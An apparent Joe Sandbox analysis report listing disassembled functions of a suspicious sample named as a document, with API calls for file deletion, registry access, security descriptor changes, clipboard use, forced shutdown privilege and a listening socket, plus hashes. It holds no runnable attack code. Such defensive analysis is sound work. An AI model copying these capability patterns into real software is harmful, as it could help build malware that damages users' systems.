                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 7f8830dde0152dc17e3c44c2e995a98037a653f48a255a6c684734c5c8a65a6f
                                                        • Instruction ID: 8bdc85c3927265ae0e0f43ebbef10e9fc4bac2a31543a3cdbf83fe6b52369b42
                                                        • Opcode Fuzzy Hash: 7f8830dde0152dc17e3c44c2e995a98037a653f48a255a6c684734c5c8a65a6f
                                                        • Instruction Fuzzy Hash: FE310572600619AECB64DBA4DC58EDE33ACBF05321F118155FD12A30A2D7389E86CA68
                                                        Function 00716BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove_memset
                                                        • String ID: Q\E$[$\$\$\$]$^
                                                        • API String ID: 3555123492-286096704
                                                        • Opcode ID: afdcbe519479369170775a9c82c00752272ce30187b32115d559297e5b367768
                                                        • Instruction ID: b0771a206a8f770661ed2d36dc21e472d323564998f846e2f0c4bcbf2e08cfcd
                                                        • Opcode Fuzzy Hash: afdcbe519479369170775a9c82c00752272ce30187b32115d559297e5b367768
                                                        • Instruction Fuzzy Hash: DC727C71E14219DFDF28CF98D8906EDB7B1FF44314F2481A9D855AB281E738AE81DB90
                                                        Function 0077ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0077ED0C
                                                        • GetFocus.USER32 ref: 0077ED1C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0077ED27
                                                        • _memset.LIBCMT ref: 0077EE52
                                                        • GetMenuItemInfoW.USER32 ref: 0077EE7D
                                                        • GetMenuItemCount.USER32(00000000), ref: 0077EE9D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0077EEB0
                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0077EEE4
                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0077EF2C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0077EF64
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0077EF99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 3616455698-4108050209
                                                        • Opcode ID: d16d430ca09ae5e0ae1a48701c89f3001a73ee3700d0ff41cbc58b806ae236b3
                                                        • Instruction ID: e6df7343802064f6f417c250af9285e9133eec916c24142efd60863fbc850130
                                                        • Opcode Fuzzy Hash: d16d430ca09ae5e0ae1a48701c89f3001a73ee3700d0ff41cbc58b806ae236b3
                                                        • Instruction Fuzzy Hash: 0F817071208301AFDB60DF14D884A6BBBE4FF88394F00896EF99997291D778DD45CB92
                                                        Function 0074B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                          • Part of subcall function 0074B8E7: GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                          • Part of subcall function 0074B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
                                                          • Part of subcall function 0074B8E7: RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                          • Part of subcall function 0074B982: GetProcessHeap.KERNEL32(00000008,0074B3E1,00000000,00000000,?,0074B3E1,?), ref: 0074B98E
                                                          • Part of subcall function 0074B982: RtlAllocateHeap.NTDLL(00000000,?,0074B3E1), ref: 0074B995
                                                          • Part of subcall function 0074B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0074B3E1,?), ref: 0074B9A6
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0074B3FC
                                                        • _memset.LIBCMT ref: 0074B411
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0074B430
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B441
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0074B47E
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0074B49A
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B4B7
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0074B4C6
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0074B4CD
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0074B4EE
                                                        • CopySid.ADVAPI32(00000000), ref: 0074B4F5
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0074B526
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0074B54C
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0074B560
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 2347767575-0
                                                        • Opcode ID: 19f5074b57e0a591fbd20fc466cb27d31936ea501f3ba1eeac8c247f13591434
                                                        • Instruction ID: ead4cf6c264937f981d6c1de9529362c8f681e0f3d9f0f25f0f9071acd922792
                                                        • Opcode Fuzzy Hash: 19f5074b57e0a591fbd20fc466cb27d31936ea501f3ba1eeac8c247f13591434
                                                        • Instruction Fuzzy Hash: C9511A71900209EBDF14DFA5DC85AEEBB79FF08300F14812AE915A7291DB39DE15CB64
                                                        Function 00742C3C Relevance: 18.3, APIs: 12, Instructions: 275timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock.LIBCMT ref: 00742C5E
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • ____lc_codepage_func.LIBCMT ref: 00742CA5
                                                        • __getenv_helper_nolock.LIBCMT ref: 00742CC6
                                                        • _free.LIBCMT ref: 00742CF9
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _strlen.LIBCMT ref: 00742D00
                                                        • __malloc_crt.LIBCMT ref: 00742D07
                                                        • _strlen.LIBCMT ref: 00742D25
                                                        • __invoke_watson.LIBCMT ref: 00742D48
                                                        • _free.LIBCMT ref: 00742D57
                                                        • GetTimeZoneInformation.KERNEL32(007D0A58,00000000,00000000,00000000,00000000,00000000,007C6B10,00000030,007429F1,007C6AF0,00000008,00735D07), ref: 00742D68
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,007D0A5C,000000FF,?,0000003F,00000000,?), ref: 00742DE4
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,007D0AB0,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00742E1D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2302051780-0
                                                        • Opcode ID: 8a0f8fe68dc9b351f48e524b7b32c57392b01dd9895ff2d8654c69414e1d6f25
                                                        • Instruction ID: f3515918e9faa155ea0680d7e5e8dbcde043488e4864e40c6008142383f37b6c
                                                        • Opcode Fuzzy Hash: 8a0f8fe68dc9b351f48e524b7b32c57392b01dd9895ff2d8654c69414e1d6f25
                                                        • Instruction Fuzzy Hash: 29A1DF71E04215DEDB159F68D889BADBBB8FF49310F94505AF010AB2A2DB3C8C53CB64
                                                        Function 00756E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00757C0C: GetFileAttributesW.KERNEL32(?,00756A7B), ref: 00757C0D
                                                        • _wcscat.LIBCMT ref: 00756E7E
                                                        • __wsplitpath.LIBCMT ref: 00756E99
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00756EAE
                                                        • _wcscpy.LIBCMT ref: 00756EDD
                                                        • _wcscat.LIBCMT ref: 00756EEF
                                                        • _wcscat.LIBCMT ref: 00756F01
                                                        • DeleteFileW.KERNEL32(?), ref: 00756F0E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00756F22
                                                        • FindClose.KERNEL32(00000000), ref: 00756F3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                        • String ID: \*.*
                                                        • API String ID: 2643075503-1173974218
                                                        • Opcode ID: d989c964675aa4ade74e7f7366eac30eecd6ba9af020dfff8b8226af2fac5d7f
                                                        • Instruction ID: 0133859213cbbf894327564b92e69d77bdd0ed8ece696b8c599140a35cd3ff7f
                                                        • Opcode Fuzzy Hash: d989c964675aa4ade74e7f7366eac30eecd6ba9af020dfff8b8226af2fac5d7f
                                                        • Instruction Fuzzy Hash: 2A21C572409348AEC310EBA4D8899DF7BDCAF59314F444A1AF9D4C3042EA38E64D87A2
                                                        Function 007730AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077317F
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077321E
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007732B6
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007734F5
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00773502
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 0725e8edb1f79baf08639f3dcd95718eb67b5288041e6d040346f3fa99444a30
                                                        • Instruction ID: f9914c605f5977d921329fa9aa831f0faa4a7aad39081a89c68c03d5ad9e1cb4
                                                        • Opcode Fuzzy Hash: 0725e8edb1f79baf08639f3dcd95718eb67b5288041e6d040346f3fa99444a30
                                                        • Instruction Fuzzy Hash: 8CE16B71204200EFCB15DF28C895D6ABBE8EF88750B04C56DF94ADB2A1DB38ED45DB52
                                                        Function 00767294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: aa2bec3c96c11fca4901d2508f48fc3cd5aef7505f828d1ff0a8d579031a2e8e
                                                        • Instruction ID: fb44c78aacdef2117a2752c24188ddcd9aed15ea4c2d9aaacac7298031f7ee8f
                                                        • Opcode Fuzzy Hash: aa2bec3c96c11fca4901d2508f48fc3cd5aef7505f828d1ff0a8d579031a2e8e
                                                        • Instruction Fuzzy Hash: 61216D31204210AFDB24AF65DC59B6D7BA8EF44755F00C01AFD0A9B261DB7CED42CB98
                                                        Function 007624A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007624F6
                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00762526
                                                        • _wcscmp.LIBCMT ref: 0076253A
                                                        • _wcscmp.LIBCMT ref: 00762555
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007625F3
                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00762609
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 13e60e4db8c3c275da065ad6fbe6c1fd7f888d2e04d6152b2c01ea9f0794cb6b
                                                        • Instruction ID: 26972c2691c2747e09b8ea05dac76097ece25b3b9f507d2a0cff06d5a2c327af
                                                        • Opcode Fuzzy Hash: 13e60e4db8c3c275da065ad6fbe6c1fd7f888d2e04d6152b2c01ea9f0794cb6b
                                                        • Instruction Fuzzy Hash: 4641817190460AEFCF65DFA4CC59AEE7BB4FF05310F108456E816A2192E7389E95CF90
                                                        Function 00718CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: 8479064daa59d51d9fcf5a41986887b2168ffd36fd3b1e2da51765249ead4978
                                                        • Instruction ID: 5ec956d1c1b937ee2a272d8c82fedb472ce96005d7ccc04f12fcb6e23cfdc8f4
                                                        • Opcode Fuzzy Hash: 8479064daa59d51d9fcf5a41986887b2168ffd36fd3b1e2da51765249ead4978
                                                        • Instruction Fuzzy Hash: 2A926A71E0021A8BDF25CF58D8507EDB7B1BB54314F2481AAE919AB2C0E7789DC2DB91
                                                        Function 00718530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 1462a88d6d704824c80f99204bf3778d4049f8a964a798a145414f7e865822a0
                                                        • Instruction ID: ff0ab519a84654eaac68afc205e1b24ab860d4c1e5ccdfe41a105c01f3cc30b6
                                                        • Opcode Fuzzy Hash: 1462a88d6d704824c80f99204bf3778d4049f8a964a798a145414f7e865822a0
                                                        • Instruction Fuzzy Hash: 7C129C70A00609DFDF04DFA8D985AEEB7F5FF48300F208529E406E7291EB39A951CB65
                                                        Function 007582D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0074BF0F
                                                          • Part of subcall function 0074BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0074BF3C
                                                          • Part of subcall function 0074BEC3: GetLastError.KERNEL32 ref: 0074BF49
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0075830C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 1d4a32cf4149338fd0c3dc4c7b8693aab90c1aaa8cf92e0f2d7146378df96097
                                                        • Instruction ID: f602dead502824409f90cc30ece279c97b6acd4182677a514d5fae23b53c1b07
                                                        • Opcode Fuzzy Hash: 1d4a32cf4149338fd0c3dc4c7b8693aab90c1aaa8cf92e0f2d7146378df96097
                                                        • Instruction Fuzzy Hash: 53018471B44215ABE7A85678CC4EBFF7658AB00B82F140425FD43F20D1DFEC9C0981A5
                                                        Function 007691DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00769235
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769244
                                                        • bind.WS2_32(00000000,?,00000010), ref: 00769260
                                                        • listen.WS2_32(00000000,00000005), ref: 0076926F
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769289
                                                        • closesocket.WS2_32(00000000), ref: 0076929D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
